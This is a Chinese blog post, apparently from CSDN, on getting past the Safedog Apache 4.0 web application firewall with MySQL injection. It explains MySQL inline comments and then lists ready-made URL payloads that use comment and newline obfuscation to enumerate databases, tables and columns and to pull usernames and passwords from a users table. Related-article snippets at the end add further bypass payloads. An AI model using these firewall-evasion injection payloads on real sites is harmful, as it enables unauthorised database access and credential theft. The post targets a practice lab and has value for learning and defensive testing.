SQL注入 安全狗绕过

最新推荐文章于 2024-07-09 15:48:59 发布
最新推荐文章于 2024-07-09 15:48:59 发布
阅读量373 收藏 3
点赞数
分类专栏: Web安全 文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927266/article/details/120456202
版权

0x00 前言

最近看了几篇关于安全狗 Bypass 的文章,绕过方式五花八门。在此以安全狗 apache4.0.30255 为例,简单做个总结。

0x01 相关知识

/* … */ 在大部分语言中都是一种注释,处于 /* … */ 之中的语句是不被执行的。但 MySQL 为了保证兼容性,比如要求从 mysqldump 导出的 SQL 语句能被其它数据库直接使用,它把一些特有的仅在 MySQL 上能执行的语句放在 /*! … */ 中,这样这些语句在其它数据库中就不会被当作执行语句,但在 MySQL 中它会执行。

In a word,/* */ 在 MySQL 里代表多行注释,它是 SQL 的标准。但是 MySQL 扩宽了注释的功能,如果在开头的 /* 后头加入 !,那么此注释里的语句还将被推行。

举个栗子:

mysql> /*! select * from test */;
+------+
| id   |
+------+
|    1 |
|    2 |
|    3 |
+------+
3 rows in set (0.00 sec)

再看如下语句:

/*!50001 select * from test */;

这里 50001 表示数据库版本号,该语句只有在 5.00.01 以上版本的数据库中才会被执行。

0x02 Bypass

  • ordey by
?id=1' order /*//--/*/ by 10 --+
  • union select

union select => union/*//--/*/select

?id=-1' union /*//--/*/     /*!--+/*%0aselect/*!1,2,3*/  --+
  • database()

union select 1,2,3 => union /*!--+/*%0aselect/*!1,2,*/ 3

?id=-1' union /*//--/*/     /*!--+/*%0aselect/*!1,2,*/database /*//--/*/ ()  --+
  • 获取其他的库
?id=-1' union   /*!--+/*%0aselect/*!1,2,*/  group_concat(schema_name)    /*!from*/    /*!--+/*%0ainformation_schema./*!schemata*/ --+
  • 一次性获取所有的表
?id=-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(table_name)    /*!from*/     /*!--+/*%0ainformation_schema./*!tables*/ where table_schema='security' --+
  • 一次性获取所有的字段
?id=-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(column_name)    /*!from*/     /*!--+/*%0ainformation_schema./*!columns*/ where table_name='users' --+
  • 一次性获取字段里面的值
?id=-1' union /*!--+/*%0aselect/*!1,2,*/  group_concat(concat_ws(0x7e,username, password))     /*!from*/    security.users --+

0x03 Summary

总结不出什么具体规律,总的来说就是结合 /*!*/、/**/、–+、%0a、%23,花里胡哨就完事。

0x04 Reference

星期五实验室 SQL注入安全狗Aache绕过
https://www.cnblogs.com/itcomputer/articles/5253263.html

iO快到碗里来
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
SQL注入绕过安全狗的五种方法
01-11 1335
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
SQL注入绕过安全狗
blackguest07的博客
01-12 2357
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)
最新发布
wananxuexihu的博客
07-09 947
在记忆里上次绕安全狗还是在上次,开开心心把自己之前绕过狗的payload拿出来,发现全部被拦截了,事情一下子就严肃起来了,这就开整。
安全狗SQL注入绕过
qq_38675102的博客
02-09 2558
安全狗waf绕过
【WAF剖析】——SQL注入安全狗bypass深度剖析
Demo不是emo的博客
11-23 6887
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
web安全-SQL注入-认识安全狗-WAF绕过常用方法以及示例
ran的博客
01-20 1706
特殊符号%00,部分 waf 遇到%00 截断,只能获取到前面的参数,无法获取到后面的有害参数输 入 , 从 而 导 致 Bypass。select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin。mysql 注释符有三种:#、/*...*/、-- ... (注意--后面有一个空格)// -- --+ # /**/ + :%00 /!Hex() bin() 等价于 ascii()
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 3507
Safedog 4.0 bypass绕过
安全狗绕过
alien0011的博客
06-09 3454
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5260
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
安全狗bypass
凝聚力安全团队
07-22 364
目录sql注入xss目录扫描 sql注入 http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-1--+ http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/and/**/-1=-2--+ http://10.1.1.18/control/sqlinject/manifest_error.php?id=1'/**/order--+/
【WAF剖析】——文件上传之安全狗bypass
Demo不是emo的博客
11-25 8027
文件上传的WAF你见过吗,关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5050
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
安全狗 mysql_绕过安全狗进行sql注入MySQL
weixin_34642354的博客
01-18 527
看我如何一步步绕过安全狗前言前几天渗透了一个站,由于没有做好善后工作被管理员发现了,再次访问那个站的时候,管理员已经删了大马,装上了网站安全狗(我估计大马应该是安全狗删除的,毕竟那个管理员真的太懒了,我的小马还在,并且居然菜刀还可以连接),为了给这个管理员增强点安全防护意识,我就开始研究起了安全狗绕过。 实验环境网站安全狗v4.0apache 2.4.27php 5.6MySQL 5.7 我们需...
绕过安全狗进行sql注入MySQL
热门推荐
一个安全研究员
07-31 1万+
过狗啦
实战sql注入绕过安全狗
weixin_45901902的博客
08-19 595
实战安全狗bypass 之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站 绕过 and 1=1 这种很显然直接被拦截,这里进行fuzz and 1 like 1 拦截 and /!1=1/ 不拦截 and hex(1) 不拦截 %23%0a 1=1 拦截 绕过order by 发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截 安全狗他拦截哪里我们就绕哪里 order%23%0aby 1 不拦截 order /!by/ 1拦截 .
sql bypass 安全狗(最新)
yggcwhat
05-10 525
sql bypass 安全狗(最新)
SQL手工注入详解&绕过安全狗
joke_ljh的博客
10-10 2622
1.常规判断注入点: and 1 like 1 ,测试回显正常 and 2 like 1 ,测试回显错误 and 1=1,测试回显正常 and 1=2,测试回显错误 1.1 可以用一些其它的方法,有时可以绕过waf and case when 1=1 then 1 else 0 end 页面返回正常 and case when 1=1 then 0 else 1 end 页面返回不正常 and sleep(5) 页面延迟5s an
绕过SQL注入安全狗4.0的实战挑战
3. **SQL注入绕过策略**: 文档的重点可能在于如何利用SQL注入技术来避开这种验证机制。例如,攻击者可能会尝试使用SQL注解,如`' OR 1=1; --`,将条件变成永远为真的表达式,使得空密码也能通过验证。另一种方法可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值